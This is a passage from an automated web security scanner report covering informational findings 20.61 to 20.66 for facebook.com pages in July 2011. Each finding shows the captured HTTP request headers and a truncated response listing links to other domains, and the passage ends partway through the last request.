<noscript><img src="http://ad.doubleclick.net/activity;src=2614082;type=landi584;cat=t3fba623;ord=1205391242?"width="1" height="1" alt=""></noscript><img class="tracking_pixel" src="http://ads.revsci.net/adserver/ako?rsi_noads=1&rsi_pixel=1&rsi_account=788D060407632FEEC1CAF36849FCD437&rsi_site=5B0808D11C7842FEE1E62BF14D546420&rsi_event=4F8AC0F46333C645B9A6CF1F71CCA4D9" /><img class="tracking_pixel img" src="http://a.ok.facebook.com/cm/bk/9998-58063-3840-0?talktothem=1&amp;mpuid=1311087465546" alt="" />
...[SNIP]...

20.61. http://www.facebook.com/ajax/intl/language_dialog.php  previous  next

Summary

Severity:   Information
Confidence:   Certain
Host:   http://www.facebook.com
Path:   /ajax/intl/language_dialog.php

Issue detail

The page was loaded from a URL containing a query string:The response contains the following links to other domains:

Request

GET /ajax/intl/language_dialog.php?uri=http%3A%2F%2Fwww.facebook.com%2Fr.php HTTP/1.1
Host: www.facebook.com
Proxy-Connection: keep-alive
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/534.30 (KHTML, like Gecko) Chrome/12.0.742.122 Safari/534.30
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: datr=3GHNTeTln1shCRlV4nyEfKsc; campaign_click_url=%2Fcampaign%2Flanding.php%3Fcampaign_id%3D137675572948107%26partner_id%3Dbing.com%26placement%3Dlike_button%26extra_1%3Dhttp%253A%252F%252Fwww.bing.com%252F%26extra_2%3DUS; lsd=xZqF4; reg_fb_gate=http%3A%2F%2Fwww.facebook.com%2Fr.php; wd=1065x723

Response

HTTP/1.1 200 OK
P3P: CP="Facebook does not have a P3P policy. Learn why here: http://fb.me/p3p"
Set-Cookie: wd=deleted; expires=Thu, 01-Jan-1970 00:00:01 GMT; path=/; domain=.facebook.com; httponly
Content-Type: text/html; charset=utf-8
X-FB-Server: 10.62.111.31
X-Cnection: close
Date: Tue, 19 Jul 2011 14:57:23 GMT
Content-Length: 42761

<!DOCTYPE html><html lang="en" id="facebook" class="no_js">
<head><meta charset="utf-8" /><script>CavalryLogger=false;window._script_path = "\/ajax\/intl\/language_dialog.php";window._EagleEyeSeed="bq
...[SNIP]...
</noscript>
<link type="text/css" rel="stylesheet" href="http://static.ak.fbcdn.net/rsrc.php/v1/yz/r/5fFMnagjg2S.css" />
<link type="text/css" rel="stylesheet" href="http://static.ak.fbcdn.net/rsrc.php/v1/y0/r/8Wh3q4omJpY.css" />
<link type="text/css" rel="stylesheet" href="http://static.ak.fbcdn.net/rsrc.php/v1/yR/r/bQKCJas2cuT.css" />
<link type="text/css" rel="stylesheet" href="http://static.ak.fbcdn.net/rsrc.php/v1/yo/r/FbBFWVaYbEC.css" />
<link type="text/css" rel="stylesheet" href="http://static.ak.fbcdn.net/rsrc.php/v1/y6/r/hbbyfqQ4R56.css" />

<script type="text/javascript" src="http://static.ak.fbcdn.net/rsrc.php/v1/y-/r/X0wc5aPaQ9j.js"></script>
...[SNIP]...
</script>
<link rel="search" type="application/opensearchdescription+xml" href="http://static.ak.fbcdn.net/rsrc.php/yJ/r/H2SSvhJMJA-.xml" title="Facebook" />
<link rel="shortcut icon" href="http://static.ak.fbcdn.net/rsrc.php/yi/r/q9U99v3_saj.ico" /></head>
...[SNIP]...
<a class="lfloat" href="/" title="Go to Facebook Home"><img class="fb_logo img" src="http://static.ak.fbcdn.net/rsrc.php/v1/yp/r/kk8dc2UJYJ4.png" alt="Facebook logo" width="170" height="36" /></a>
...[SNIP]...

20.62. http://www.facebook.com/ajax/prefetch.php  previous  next

Summary

Severity:   Information
Confidence:   Certain
Host:   http://www.facebook.com
Path:   /ajax/prefetch.php

Issue detail

The page was loaded from a URL containing a query string:The response contains the following links to other domains:

Request

GET /ajax/prefetch.php?svn_rev=407015&tier=2 HTTP/1.1
Host: www.facebook.com
Proxy-Connection: keep-alive
Referer: http://www.facebook.com/terms.php?ref=pf
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/534.30 (KHTML, like Gecko) Chrome/12.0.742.122 Safari/534.30
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: datr=3GHNTeTln1shCRlV4nyEfKsc; lsd=xZqF4; reg_fb_gate=http%3A%2F%2Fwww.facebook.com%2Fr.php; campaign_click_url=%2Fcampaign%2Flanding.php%3Fplacement%3Dpflo%26campaign_id%3D402047449186%26extra_1%3Dauto; reg_fb_ref=http%3A%2F%2Fwww.facebook.com%2Fhelp%2F%3Fref%3Dpf

Response

HTTP/1.1 200 OK
Cache-Control: public,max-age=31536000
Content-Type: text/html;charset=utf-8
Expires: Wed, 18 Jul 2012 15:01:02 GMT
P3P: CP="Facebook does not have a P3P policy. Learn why here: http://fb.me/p3p"
Set-Cookie: __utma=deleted; expires=Thu, 01-Jan-1970 00:00:01 GMT; path=/; domain=.facebook.com; httponly
Set-Cookie: __utmb=deleted; expires=Thu, 01-Jan-1970 00:00:01 GMT; path=/; domain=.facebook.com; httponly
Set-Cookie: __utmc=deleted; expires=Thu, 01-Jan-1970 00:00:01 GMT; path=/; domain=.facebook.com; httponly
Set-Cookie: __utmz=deleted; expires=Thu, 01-Jan-1970 00:00:01 GMT; path=/; domain=.facebook.com; httponly
Set-Cookie: svid=deleted; expires=Thu, 01-Jan-1970 00:00:01 GMT; path=/; domain=.facebook.com; httponly
Set-Cookie: wd=deleted; expires=Thu, 01-Jan-1970 00:00:01 GMT; path=/; domain=.facebook.com; httponly
X-FB-Server: 10.62.99.40
X-Cnection: close
Date: Tue, 19 Jul 2011 15:01:02 GMT
Content-Length: 7354

<!DOCTYPE html><html><head><script>document.domain = 'facebook.com';</script><link type="text/css" rel="stylesheet" href="http://static.ak.fbcdn.net/rsrc.php/v1/yL/r/a1RB0wRyoBD.css" /><link type="text/css" rel="stylesheet" href="http://static.ak.fbcdn.net/rsrc.php/v1/y5/r/q30FbKmaBid.css" /><link type="text/css" rel="stylesheet" href="http://static.ak.fbcdn.net/rsrc.php/v1/y8/r/SNrGdWeoQHs.css" /><link type="text/css" rel="stylesheet" href="http://static.ak.fbcdn.net/rsrc.php/v1/yJ/r/rSJeTgoHNUS.css" /><link type="text/css" rel="stylesheet" href="http://static.ak.fbcdn.net/rsrc.php/v1/y4/r/SK9j5prLTwj.css" /><link type="text/css" rel="stylesheet" href="http://static.ak.fbcdn.net/rsrc.php/v1/yP/r/aBJXPgldonq.css" /><link type="text/css" rel="stylesheet" href="http://static.ak.fbcdn.net/rsrc.php/v1/yc/r/NGblq-c7mGZ.css" /><link type="text/css" rel="stylesheet" href="http://static.ak.fbcdn.net/rsrc.php/v1/ys/r/NoGBEHOl3Wf.css" /><link type="text/css" rel="stylesheet" href="http://static.ak.fbcdn.net/rsrc.php/v1/y5/r/D-4QGnNagV6.css" /><link type="text/css" rel="stylesheet" href="http://static.ak.fbcdn.net/rsrc.php/v1/yH/r/87W0ancRJRW.css" /><link type="text/css" rel="stylesheet" href="http://static.ak.fbcdn.net/rsrc.php/v1/y7/r/KZtmMbNS3_L.css" /><link type="text/css" rel="stylesheet" href="http://static.ak.fbcdn.net/rsrc.php/v1/yv/r/bDUZuV99E60.css" /><link type="text/css" rel="stylesheet" href="http://static.ak.fbcdn.net/rsrc.php/v1/yR/r/bQKCJas2cuT.css" /><link type="text/css" rel="stylesheet" href="http://static.ak.fbcdn.net/rsrc.php/v1/yE/r/rwkuDRWV9jd.css" /><link type="text/css" rel="stylesheet" href="http://static.ak.fbcdn.net/rsrc.php/v1/yt/r/JDZvhitRmkG.css" /><link type="text/css" rel="stylesheet" href="http://static.ak.fbcdn.net/rsrc.php/v1/y0/r/2Cj0Ry1zsG6.css" /><link type="text/css" rel="stylesheet" href="http://static.ak.fbcdn.net/rsrc.php/v1/yW/r/JtYPs2Da_dw.css" /><link type="text/css" rel="stylesheet" href="http://static.ak.fbcdn.net/rsrc.php/v1/yK/r/2oTj9mwQeS-.css" /><link type="text/css" rel="stylesheet" href="http://static.ak.fbcdn.net/rsrc.php/v1/yF/r/sobEsVhahXR.css" /><link type="text/css" rel="stylesheet" href="http://static.ak.fbcdn.net/rsrc.php/v1/ym/r/OFPuB9qmfib.css" /><link type="text/css" rel="stylesheet" href="http://static.ak.fbcdn.net/rsrc.php/v1/ye/r/K_RxgTvVokq.css" /><link type="text/css" rel="stylesheet" href="http://static.ak.fbcdn.net/rsrc.php/v1/yD/r/V-zkfHT8CXb.css" /><link type="text/css" rel="stylesheet" href="http://static.ak.fbcdn.net/rsrc.php/v1/y7/r/ubbnH6M9ljE.css" /><link type="text/css" rel="stylesheet" href="http://static.ak.fbcdn.net/rsrc.php/v1/yX/r/NE1qNsIIHmi.css" /><link type="text/css" rel="stylesheet" href="http://static.ak.fbcdn.net/rsrc.php/v1/yo/r/msTi-EL7vCK.css" /><link type="text/css" rel="stylesheet" href="http://static.ak.fbcdn.net/rsrc.php/v1/yO/r/j6Y0USeru-T.css" /><link type="text/css" rel="stylesheet" href="http://static.ak.fbcdn.net/rsrc.php/v1/y1/r/r0jm6f8JtY2.css" /><link type="text/css" rel="stylesheet" href="http://static.ak.fbcdn.net/rsrc.php/v1/yv/r/SYIMzW6wi61.css" /><link type="text/css" rel="stylesheet" href="http://static.ak.fbcdn.net/rsrc.php/v1/yI/r/x_JdY7BNW9-.css" /><link type="text/css" rel="stylesheet" href="http://static.ak.fbcdn.net/rsrc.php/v1/yo/r/Rgx_Vz7nSNo.css" /><link type="text/css" rel="stylesheet" href="http://static.ak.fbcdn.net/rsrc.php/v1/yc/r/DZLa1PZIieN.css" /><link type="text/css" rel="stylesheet" href="http://static.ak.fbcdn.net/rsrc.php/v1/yr/r/Ci-JcEcsrg9.css" /><link type="text/css" rel="stylesheet" href="http://static.ak.fbcdn.net/rsrc.php/v1/y-/r/HHkUms5lcpx.css" /><link type="text/css" rel="stylesheet" href="http://static.ak.fbcdn.net/rsrc.php/v1/yI/r/z_rHQCDmDDh.css" /><link type="text/css" rel="stylesheet" href="http://static.ak.fbcdn.net/rsrc.php/v1/yP/r/FnGB7tUxwE3.css" /><link type="text/css" rel="stylesheet" href="http://static.ak.fbcdn.net/rsrc.php/v1/yO/r/O4MC2pFJMzJ.css" /><link type="text/css" rel="stylesheet" href="http://static.ak.fbcdn.net/rsrc.php/v1/y8/r/Dg8YLPWKyk7.css" /><link type="text/css" rel="stylesheet" href="http://static.ak.fbcdn.net/rsrc.php/v1/yN/r/ur_c5XpT6zc.css" /><link type="text/css" rel="stylesheet" href="http://static.ak.fbcdn.net/rsrc.php/v1/y1/r/Mb-ySEi3O0b.css" /><link type="text/css" rel="stylesheet" href="http://static.ak.fbcdn.net/rsrc.php/v1/yi/r/erCj3jAAsca.css" /><link type="text/css" rel="stylesheet" href="http://static.ak.fbcdn.net/rsrc.php/v1/yy/r/Trz9qEKGISz.css" /><link type="text/css" rel="stylesheet" href="http://static.ak.fbcdn.net/rsrc.php/v1/yB/r/PzNsk8U51ji.css" /><link type="text/css" rel="stylesheet" href="http://static.ak.fbcdn.net/rsrc.php/v1/yo/r/otNsMnT3Ccb.css" /><link type="text/css" rel="stylesheet" href="http://static.ak.fbcdn.net/rsrc.php/v1/y-/r/-hUG5Dc8o3Z.css" /><link type="text/css" rel="stylesheet" href="http://static.ak.fbcdn.net/rsrc.php/v1/yy/r/POIirpFgl5q.css" /><link type="text/css" rel="stylesheet" href="http://static.ak.fbcdn.net/rsrc.php/v1/ys/r/qirUjHNG9oJ.css" /><link type="text/css" rel="stylesheet" href="http://static.ak.fbcdn.net/rsrc.php/v1/y3/r/sdwD1rGJXK2.css" /><link type="text/css" rel="stylesheet" href="http://static.ak.fbcdn.net/rsrc.php/v1/yP/r/hkM0mPGHIE1.css" /><link type="text/css" rel="stylesheet" href="http://static.ak.fbcdn.net/rsrc.php/v1/yh/r/uYvCnbsceoH.css" /><link type="text/css" rel="stylesheet" href="http://static.ak.fbcdn.net/rsrc.php/v1/yG/r/Bqaiy6eGUJa.css" /><link type="text/css" rel="stylesheet" href="http://static.ak.fbcdn.net/rsrc.php/v1/yM/r/HTDWQBuWGI8.css" /><link type="text/css" rel="stylesheet" href="http://static.ak.fbcdn.net/rsrc.php/v1/ya/r/zpzCcjhbyCZ.css" /><link type="text/css" rel="stylesheet" href="http://static.ak.fbcdn.net/rsrc.php/v1/y6/r/zOMloODzDF_.css" /><link type="text/css" rel="stylesheet" href="http://static.ak.fbcdn.net/rsrc.php/v1/yI/r/_J12hr-nH-4.css" /><link type="text/css" rel="stylesheet" href="http://static.ak.fbcdn.net/rsrc.php/v1/ym/r/DiI7ZwzsMWE.css" /><link type="text/css" rel="stylesheet" href="http://static.ak.fbcdn.net/rsrc.php/v1/yP/r/c6emPCFfPcn.css" /><link type="text/css" rel="stylesheet" href="http://static.ak.fbcdn.net/rsrc.php/v1/yo/r/heGhkAidtX0.css" /><link type="text/css" rel="stylesheet" href="http://static.ak.fbcdn.net/rsrc.php/v1/y9/r/PVBa_VtP99O.css" /><link type="text/css" rel="stylesheet" href="http://static.ak.fbcdn.net/rsrc.php/v1/yu/r/7f4SE3bv4B2.css" /><link type="text/css" rel="stylesheet" href="http://static.ak.fbcdn.net/rsrc.php/v1/yA/r/C9intiNq_3N.css" /><link type="text/css" rel="stylesheet" href="http://static.ak.fbcdn.net/rsrc.php/v1/yE/r/4F3Iv5NBJOL.css" /><link type="text/css" rel="stylesheet" href="http://static.ak.fbcdn.net/rsrc.php/v1/y0/r/vTlzK_6DGwe.css" /><link type="text/css" rel="stylesheet" href="http://static.ak.fbcdn.net/rsrc.php/v1/yH/r/sHCa4y3LzLj.css" /><link type="text/css" rel="stylesheet" href="http://static.ak.fbcdn.net/rsrc.php/v1/y1/r/rrdmptIcoxd.css" /><link type="text/css" rel="stylesheet" href="http://static.ak.fbcdn.net/rsrc.php/v1/y3/r/Q3Oe8zcURw5.css" /><link type="text/css" rel="stylesheet" href="http://static.ak.fbcdn.net/rsrc.php/v1/yQ/r/KdKjGooM6-s.css" /><link type="text/css" rel="stylesheet" href="http://static.ak.fbcdn.net/rsrc.php/v1/ye/r/edfMk-9nmKj.css" /></head>
...[SNIP]...

20.63. http://www.facebook.com/ajax/prefetch.php  previous  next

Summary

Severity:   Information
Confidence:   Certain
Host:   http://www.facebook.com
Path:   /ajax/prefetch.php

Issue detail

The page was loaded from a URL containing a query string:The response contains the following links to other domains:

Request

GET /ajax/prefetch.php?svn_rev=407015&tier=1 HTTP/1.1
Host: www.facebook.com
Proxy-Connection: keep-alive
Referer: http://www.facebook.com/terms.php?ref=pf
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/534.30 (KHTML, like Gecko) Chrome/12.0.742.122 Safari/534.30
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: datr=3GHNTeTln1shCRlV4nyEfKsc; lsd=xZqF4; reg_fb_gate=http%3A%2F%2Fwww.facebook.com%2Fr.php; campaign_click_url=%2Fcampaign%2Flanding.php%3Fplacement%3Dpflo%26campaign_id%3D402047449186%26extra_1%3Dauto; reg_fb_ref=http%3A%2F%2Fwww.facebook.com%2Fhelp%2F%3Fref%3Dpf; wd=1065x723

Response

HTTP/1.1 200 OK
Cache-Control: public,max-age=31536000
Content-Type: text/html;charset=utf-8
Expires: Wed, 18 Jul 2012 14:59:00 GMT
P3P: CP="Facebook does not have a P3P policy. Learn why here: http://fb.me/p3p"
Set-Cookie: __utma=deleted; expires=Thu, 01-Jan-1970 00:00:01 GMT; path=/; domain=.facebook.com; httponly
Set-Cookie: __utmb=deleted; expires=Thu, 01-Jan-1970 00:00:01 GMT; path=/; domain=.facebook.com; httponly
Set-Cookie: __utmc=deleted; expires=Thu, 01-Jan-1970 00:00:01 GMT; path=/; domain=.facebook.com; httponly
Set-Cookie: __utmz=deleted; expires=Thu, 01-Jan-1970 00:00:01 GMT; path=/; domain=.facebook.com; httponly
Set-Cookie: svid=deleted; expires=Thu, 01-Jan-1970 00:00:01 GMT; path=/; domain=.facebook.com; httponly
Set-Cookie: wd=deleted; expires=Thu, 01-Jan-1970 00:00:01 GMT; path=/; domain=.facebook.com; httponly
X-FB-Server: 10.62.99.45
X-Cnection: close
Date: Tue, 19 Jul 2011 14:59:00 GMT
Content-Length: 1414

<!DOCTYPE html><html><head><script>document.domain = 'facebook.com';</script><link type="text/css" rel="stylesheet" href="http://static.ak.fbcdn.net/rsrc.php/v1/y7/r/VXhD5_PgFOo.css" /><link type="text/css" rel="stylesheet" href="http://static.ak.fbcdn.net/rsrc.php/v1/yo/r/FbBFWVaYbEC.css" /><link type="text/css" rel="stylesheet" href="http://static.ak.fbcdn.net/rsrc.php/v1/y0/r/8Wh3q4omJpY.css" /><link type="text/css" rel="stylesheet" href="http://static.ak.fbcdn.net/rsrc.php/v1/yT/r/wAZMHdyxy_L.css" /><link type="text/css" rel="stylesheet" href="http://static.ak.fbcdn.net/rsrc.php/v1/y6/r/hbbyfqQ4R56.css" /><link type="text/css" rel="stylesheet" href="http://static.ak.fbcdn.net/rsrc.php/v1/yl/r/6gpjXzvXDSF.css" /><link type="text/css" rel="stylesheet" href="http://static.ak.fbcdn.net/rsrc.php/v1/y8/r/-Ho_EIT75He.css" /><link type="text/css" rel="stylesheet" href="http://static.ak.fbcdn.net/rsrc.php/v1/yF/r/FUYS70vIS4_.css" /><link type="text/css" rel="stylesheet" href="http://static.ak.fbcdn.net/rsrc.php/v1/yX/r/PPCATkRjgbb.css" /><link type="text/css" rel="stylesheet" href="http://static.ak.fbcdn.net/rsrc.php/v1/y-/r/EX2d6_qWW-3.css" /><link type="text/css" rel="stylesheet" href="http://static.ak.fbcdn.net/rsrc.php/v1/yL/r/Kc1c3lfdICw.css" /><link type="text/css" rel="stylesheet" href="http://static.ak.fbcdn.net/rsrc.php/v1/yF/r/gQh69rr8JBH.css" /></head>
...[SNIP]...

20.64. http://www.facebook.com/badges/  previous  next

Summary

Severity:   Information
Confidence:   Certain
Host:   http://www.facebook.com
Path:   /badges/

Issue detail

The page was loaded from a URL containing a query string:The response contains the following links to other domains:

Request

GET /badges/?ref=pf HTTP/1.1
Host: www.facebook.com
Proxy-Connection: keep-alive
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/534.30 (KHTML, like Gecko) Chrome/12.0.742.122 Safari/534.30
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: datr=3GHNTeTln1shCRlV4nyEfKsc; campaign_click_url=%2Fcampaign%2Flanding.php%3Fcampaign_id%3D137675572948107%26partner_id%3Dbing.com%26placement%3Dlike_button%26extra_1%3Dhttp%253A%252F%252Fwww.bing.com%252F%26extra_2%3DUS; lsd=xZqF4; reg_fb_gate=http%3A%2F%2Fwww.facebook.com%2Fr.php; reg_fb_ref=http%3A%2F%2Fwww.facebook.com%2Fmobile%2F%3Fref%3Dpf

Response

HTTP/1.1 200 OK
Cache-Control: private, no-cache, no-store, must-revalidate
Expires: Sat, 01 Jan 2000 00:00:00 GMT
P3P: CP="Facebook does not have a P3P policy. Learn why here: http://fb.me/p3p"
Pragma: no-cache
Set-Cookie: reg_fb_ref=http%3A%2F%2Fwww.facebook.com%2Fbadges%2F%3Fref%3Dpf; path=/; domain=.facebook.com
Set-Cookie: wd=deleted; expires=Thu, 01-Jan-1970 00:00:01 GMT; path=/; domain=.facebook.com; httponly
Content-Type: text/html; charset=utf-8
X-FB-Server: 10.62.92.64
X-Cnection: close
Date: Tue, 19 Jul 2011 14:57:33 GMT
Content-Length: 15265

<!DOCTYPE html><html lang="en" id="facebook" class="no_js">
<head><meta charset="utf-8" /><script>CavalryLogger=false;window._script_path = "\/badges\/index.php";window._EagleEyeSeed="emCA";</script><
...[SNIP]...
</noscript>
<link type="text/css" rel="stylesheet" href="http://static.ak.fbcdn.net/rsrc.php/v1/yG/r/gh8wxcAgNvK.css" />
<link type="text/css" rel="stylesheet" href="http://static.ak.fbcdn.net/rsrc.php/v1/y0/r/8Wh3q4omJpY.css" />
<link type="text/css" rel="stylesheet" href="http://static.ak.fbcdn.net/rsrc.php/v1/yI/r/d3jsdgznlXU.css" />
<link type="text/css" rel="stylesheet" href="http://static.ak.fbcdn.net/rsrc.php/v1/yP/r/aBJXPgldonq.css" />
<link type="text/css" rel="stylesheet" href="http://static.ak.fbcdn.net/rsrc.php/v1/yR/r/bQKCJas2cuT.css" />
<link type="text/css" rel="stylesheet" href="http://static.ak.fbcdn.net/rsrc.php/v1/yo/r/FbBFWVaYbEC.css" />
<link type="text/css" rel="stylesheet" href="http://static.ak.fbcdn.net/rsrc.php/v1/y6/r/hbbyfqQ4R56.css" />

<script type="text/javascript" src="http://static.ak.fbcdn.net/rsrc.php/v1/y-/r/X0wc5aPaQ9j.js"></script>
...[SNIP]...
</script>
<link rel="search" type="application/opensearchdescription+xml" href="http://static.ak.fbcdn.net/rsrc.php/yJ/r/H2SSvhJMJA-.xml" title="Facebook" />
<link rel="shortcut icon" href="http://static.ak.fbcdn.net/rsrc.php/yi/r/q9U99v3_saj.ico" /></head>
...[SNIP]...
<a class="lfloat" href="/" title="Go to Facebook Home"><img class="fb_logo img" src="http://static.ak.fbcdn.net/rsrc.php/v1/yp/r/kk8dc2UJYJ4.png" alt="Facebook logo" width="170" height="36" /></a>
...[SNIP]...

20.65. http://www.facebook.com/careers/  previous  next

Summary

Severity:   Information
Confidence:   Certain
Host:   http://www.facebook.com
Path:   /careers/

Issue detail

The page was loaded from a URL containing a query string:The response contains the following links to other domains:

Request

GET /careers/?ref=pf HTTP/1.1
Host: www.facebook.com
Proxy-Connection: keep-alive
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/534.30 (KHTML, like Gecko) Chrome/12.0.742.122 Safari/534.30
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: datr=3GHNTeTln1shCRlV4nyEfKsc; lsd=xZqF4; reg_fb_gate=http%3A%2F%2Fwww.facebook.com%2Fr.php; campaign_click_url=%2Fcampaign%2Flanding.php%3Fplacement%3Dpflo%26campaign_id%3D402047449186%26extra_1%3Dauto; reg_fb_ref=http%3A%2F%2Fwww.facebook.com%2Fpages%2Fcreate.php%3Fref_type%3Dsitefooter

Response

HTTP/1.1 200 OK
Cache-Control: private, no-cache, no-store, must-revalidate
Expires: Sat, 01 Jan 2000 00:00:00 GMT
P3P: CP="Facebook does not have a P3P policy. Learn why here: http://fb.me/p3p"
Pragma: no-cache
Set-Cookie: reg_fb_ref=http%3A%2F%2Fwww.facebook.com%2Fcareers%2F%3Fref%3Dpf; path=/; domain=.facebook.com
Set-Cookie: svid=deleted; expires=Thu, 01-Jan-1970 00:00:01 GMT; path=/; domain=.facebook.com; httponly
Set-Cookie: wd=deleted; expires=Thu, 01-Jan-1970 00:00:01 GMT; path=/; domain=.facebook.com; httponly
Content-Type: text/html; charset=utf-8
X-FB-Server: 10.62.121.46
X-Cnection: close
Date: Tue, 19 Jul 2011 14:57:50 GMT
Content-Length: 20897

<!DOCTYPE html><html lang="en" id="facebook" class="no_js">
<head><meta charset="utf-8" /><script>CavalryLogger=false;window._script_path = "\/careers\/index.php";window._EagleEyeSeed="Ikcl";</script>
...[SNIP]...
</noscript>
<link type="text/css" rel="stylesheet" href="http://static.ak.fbcdn.net/rsrc.php/v1/yB/r/PTQolaY4o54.css" />
<link type="text/css" rel="stylesheet" href="http://static.ak.fbcdn.net/rsrc.php/v1/y0/r/8Wh3q4omJpY.css" />
<link type="text/css" rel="stylesheet" href="http://static.ak.fbcdn.net/rsrc.php/v1/y7/r/BDfYGSOIQq_.css" />
<link type="text/css" rel="stylesheet" href="http://static.ak.fbcdn.net/rsrc.php/v1/yH/r/sHCa4y3LzLj.css" />
<link type="text/css" rel="stylesheet" href="http://static.ak.fbcdn.net/rsrc.php/v1/y-/r/H9wnMF3Lri6.css" />
<link type="text/css" rel="stylesheet" href="http://static.ak.fbcdn.net/rsrc.php/v1/yR/r/bQKCJas2cuT.css" />
<link type="text/css" rel="stylesheet" href="http://static.ak.fbcdn.net/rsrc.php/v1/yo/r/FbBFWVaYbEC.css" />
<link type="text/css" rel="stylesheet" href="http://static.ak.fbcdn.net/rsrc.php/v1/y6/r/hbbyfqQ4R56.css" />

<script type="text/javascript" src="http://static.ak.fbcdn.net/rsrc.php/v1/y-/r/X0wc5aPaQ9j.js"></script>
...[SNIP]...
</script>
<link rel="search" type="application/opensearchdescription+xml" href="http://static.ak.fbcdn.net/rsrc.php/yJ/r/H2SSvhJMJA-.xml" title="Facebook" />
<link rel="shortcut icon" href="http://static.ak.fbcdn.net/rsrc.php/yi/r/q9U99v3_saj.ico" /></head>
...[SNIP]...
<a class="lfloat" href="/" title="Go to Facebook Home"><img class="fb_logo img" src="http://static.ak.fbcdn.net/rsrc.php/v1/yp/r/kk8dc2UJYJ4.png" alt="Facebook logo" width="170" height="36" /></a>
...[SNIP]...
<div id="home_welcome"><img class="img" src="http://static.ak.fbcdn.net/rsrc.php/v1/yv/r/MoxBq-TLXDr.jpg" alt="" /><div class="home_header_description">
...[SNIP]...
<a href="/careers/department.php?dept=engineering"><img src="http://static.ak.fbcdn.net/rsrc.php/v1/yM/r/8KSjR8nTFnM.png" class="careers_dept_img" title="Software Engineering" alt="Software Engineering" /></a>
...[SNIP]...
<a href="/careers/department.php?dept=legal"><img src="http://static.ak.fbcdn.net/rsrc.php/v1/ym/r/IQqCjk5NiJN.png" class="careers_dept_img" title="Legal, Finance, Facilities &amp; Admin" alt="Legal, Finance, Facilities &amp; Admin" /></a>
...[SNIP]...
<a href="/careers/department.php?dept=communications"><img src="http://static.ak.fbcdn.net/rsrc.php/v1/yV/r/64Qw6hJnpsg.png" class="careers_dept_img" title="Communications &amp; Public Policy" alt="Communications &amp; Public Policy" /></a>
...[SNIP]...
<a href="/careers/department.php?dept=product-management"><img src="http://static.ak.fbcdn.net/rsrc.php/v1/yX/r/BmRBrG86u58.png" class="careers_dept_img" title="Product Management" alt="Product Management" /></a>
...[SNIP]...
<a href="/careers/department.php?dept=IT"><img src="http://static.ak.fbcdn.net/rsrc.php/v1/yv/r/KDo2iiCy_gr.png" class="careers_dept_img" title="IT &amp; Security" alt="IT &amp; Security" /></a>
...[SNIP]...
<a href="/careers/department.php?dept=hr"><img src="http://static.ak.fbcdn.net/rsrc.php/v1/yJ/r/dNZ8lADSyV5.png" class="careers_dept_img" title="HR &amp; Recruiting" alt="HR &amp; Recruiting" /></a>
...[SNIP]...
<a href="/careers/department.php?dept=design"><img src="http://static.ak.fbcdn.net/rsrc.php/v1/yj/r/OlBs86PzVAS.png" class="careers_dept_img" title="Design &amp; User Experience" alt="Design &amp; User Experience" /></a>
...[SNIP]...
<a href="/careers/department.php?dept=tech-ops"><img src="http://static.ak.fbcdn.net/rsrc.php/v1/yV/r/p2EQhKqozYb.png" class="careers_dept_img" title="Technical Operations" alt="Technical Operations" /></a>
...[SNIP]...
<a href="/careers/department.php?dept=growth"><img src="http://static.ak.fbcdn.net/rsrc.php/v1/yP/r/VLLIdFco_FS.png" class="careers_dept_img" title="Growth &amp; Internationalization" alt="Growth &amp; Internationalization" /></a>
...[SNIP]...
<a href="/careers/department.php?dept=sales"><img src="http://static.ak.fbcdn.net/rsrc.php/v1/y8/r/rA11fLEN3pu.png" class="careers_dept_img" title="Sales &amp; Business Development" alt="Sales &amp; Business Development" /></a>
...[SNIP]...
<a href="/careers/department.php?dept=online-ops"><img src="http://static.ak.fbcdn.net/rsrc.php/v1/yj/r/h_raeRCe0vp.png" class="careers_dept_img" title="Online Operations" alt="Online Operations" /></a>
...[SNIP]...
<a href="/careers/department.php?dept=platform"><img src="http://static.ak.fbcdn.net/rsrc.php/v1/yr/r/N5R94dW584a.png" class="careers_dept_img" title="Platform &amp; Product Marketing" alt="Platform &amp; Product Marketing" /></a>
...[SNIP]...

20.66. http://www.facebook.com/find-friends  previous  next

Summary

Severity:   Information
Confidence:   Certain
Host:   http://www.facebook.com
Path:   /find-friends

Issue detail

The page was loaded from a URL containing a query string:The response contains the following links to other domains:

Request

GET /find-friends?ref=pf HTTP/1.1
Host: www.facebook.com
Proxy-Connection: keep-alive
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/534.30 (KHTML, like Gecko) Chrome/12.0.742.122 Safari/534.30
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: datr=3GHNTeTln1shCRlV4nyEfKsc; campaign_click_url=%2Fcampaign%2Flanding.php%3Fcampaign_id%3D137675572948107%26partner_id%3Dbing.com%26placement%3Dlike_button%26extra_1%3Dhttp%253A%252F%252Fwww.bing.com%252F%26extra_2%3DUS; lsd=xZqF4; reg_fb_gate=http%3A%2F%2Fwww.facebook.com%2Fr.php

